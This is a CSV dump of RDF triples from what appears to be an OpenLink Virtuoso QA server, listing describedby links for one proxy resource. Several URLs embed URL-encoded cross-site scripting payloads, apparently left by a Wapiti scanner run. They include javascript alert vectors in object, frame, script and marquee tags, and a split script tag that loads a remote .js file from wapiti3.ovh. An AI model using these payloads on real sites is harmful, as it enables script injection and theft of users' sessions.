"subject","predicate","object"
"http://ods-qa.openlinksw.com:8896/proxy-iri/e36cd91e726384197129a041fc248314730ef483","http://www.w3.org/1999/02/22-rdf-syntax-ns#type","http://www.w3.org/1999/02/22-rdf-syntax-ns#Statement"
"http://ods-qa.openlinksw.com:8896/proxy-iri/e36cd91e726384197129a041fc248314730ef483","http://www.w3.org/2000/01/rdf-schema#label","Embedded HTML Metadata Statement 15"
"http://ods-qa.openlinksw.com:8896/proxy-iri/e36cd91e726384197129a041fc248314730ef483","http://www.w3.org/2007/05/powder-s#describedby","http://ods-qa.openlinksw.com:8896/about/id/entity/http/ods-qa.openlinksw.com:8896/sparql?default-graph-uri=http%3A%2F%2Fwww.apartmenttherapy.com%2Fcolor_search&query=DESCRIBE+%3Chttp%3A%2F%2Fods-qa.openlinksw.com%3A8896%2Fabout%2Fid%2Fentity%2Fhttp%2Fwww.apartmenttherapy.com%2Fcolor_search%3E&output=%3C%2Ftitle%3E%3Cobject+data%3D%22JaVasCript%3Aalert%28%27wc08esrjns%27%29%22%3E"
"http://ods-qa.openlinksw.com:8896/proxy-iri/e36cd91e726384197129a041fc248314730ef483","http://www.w3.org/2007/05/powder-s#describedby","http://ods-qa.openlinksw.com:8896/about/id/entity/http/ods-qa.openlinksw.com:8896/sparql?default-graph-uri=http%3A%2F%2Fwww.apartmenttherapy.com%2Fcolor_search&query=DESCRIBE%20%3Chttp%3A%2F%2Fods-qa.openlinksw.com%3A8896%2Fabout%2Fid%2Fentity%2Fhttp%2Fwww.apartmenttherapy.com%2Fcolor_search%3E&output=text%2Fhtml"
"http://ods-qa.openlinksw.com:8896/proxy-iri/e36cd91e726384197129a041fc248314730ef483","http://www.w3.org/2007/05/powder-s#describedby","http://ods-qa.openlinksw.com:8896/about/id/entity/http/ods-qa.openlinksw.com:8896/sparql?default-graph-uri=http%3A%2F%2Fwww.apartmenttherapy.com%2Fcolor_search&query=DESCRIBE+%3Chttp%3A%2F%2Fods-qa.openlinksw.com%3A8896%2Fabout%2Fid%2Fentity%2Fhttp%2Fwww.apartmenttherapy.com%2Fcolor_search%3E&output=%3C%2Ftitle%3E%3Cframeset%3E%3Cframe+src%3D%22javascript%3Aalert%28%2Fwc08esrjns%2F%29%3B%22%3E%3C%2Fframe%3E"
"http://ods-qa.openlinksw.com:8896/proxy-iri/e36cd91e726384197129a041fc248314730ef483","http://www.w3.org/2007/05/powder-s#describedby","http://ods-qa.openlinksw.com:8896/about/id/entity/http/ods-qa.openlinksw.com:8896/sparql?default-graph-uri=http%3A%2F%2Fwww.apartmenttherapy.com%2Fcolor_search&query=DESCRIBE+%3Chttp%3A%2F%2Fods-qa.openlinksw.com%3A8896%2Fabout%2Fid%2Fentity%2Fhttp%2Fwww.apartmenttherapy.com%2Fcolor_search%3E&output=%3C%2Ftitle%3E%3Cscr%3Cscript%3Eipt+src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwc08esrjnsz.js%3E%3C%2Fscript%3E"
"http://ods-qa.openlinksw.com:8896/proxy-iri/e36cd91e726384197129a041fc248314730ef483","http://www.w3.org/2007/05/powder-s#describedby","http://ods-qa.openlinksw.com:8896/about/id/entity/http/ods-qa.openlinksw.com:8896/sparql?default-graph-uri=http%3A%2F%2Fwww.apartmenttherapy.com%2Fcolor_search&query=DESCRIBE+%3Chttp%3A%2F%2Fods-qa.openlinksw.com%3A8896%2Fabout%2Fid%2Fentity%2Fhttp%2Fwww.apartmenttherapy.com%2Fcolor_search%3E&output=%3C%2Ftitle%3E%3CScRiPt%3Ealert%28%22wc08esrjns%22%29%3C%2FsCrIpT%3E"
"http://ods-qa.openlinksw.com:8896/proxy-iri/e36cd91e726384197129a041fc248314730ef483","http://www.w3.org/2007/05/powder-s#describedby","http://ods-qa.openlinksw.com:8896/about/id/entity/http/ods-qa.openlinksw.com:8896/sparql?default-graph-uri=http%3A%2F%2Fwww.apartmenttherapy.com%2Fcolor_search&query=DESCRIBE+%3Chttp%3A%2F%2Fods-qa.openlinksw.com%3A8896%2Fabout%2Fid%2Fentity%2Fhttp%2Fwww.apartmenttherapy.com%2Fcolor_search%3E&output=text%2Fhtml%2F"
"http://ods-qa.openlinksw.com:8896/proxy-iri/e36cd91e726384197129a041fc248314730ef483","http://www.w3.org/2007/05/powder-s#describedby","http://ods-qa.openlinksw.com:8896/about/id/entity/http/ods-qa.openlinksw.com:8896/sparql?default-graph-uri=http://www.apartmenttherapy.com/color_search&query=DESCRIBE+<http://ods-qa.openlinksw.com:8896/about/id/entity/http/www.apartmenttherapy.com/color_search>&output=text/html/"
"http://ods-qa.openlinksw.com:8896/proxy-iri/e36cd91e726384197129a041fc248314730ef483","http://www.w3.org/2007/05/powder-s#describedby","http://ods-qa.openlinksw.com:8896/about/id/entity/http/ods-qa.openlinksw.com:8896/sparql?default-graph-uri=http%3A%2F%2Fwww.apartmenttherapy.com%2Fcolor_search&query=DESCRIBE+%3Chttp%3A%2F%2Fods-qa.openlinksw.com%3A8896%2Fabout%2Fid%2Fentity%2Fhttp%2Fwww.apartmenttherapy.com%2Fcolor_search%3E&output=%3C%2Ftitle%3E%3Cmarquee+loop%3D1+width%3D0+onfinish%3Dprompt%28%2Fwc08esrjns%2F%29%3E"
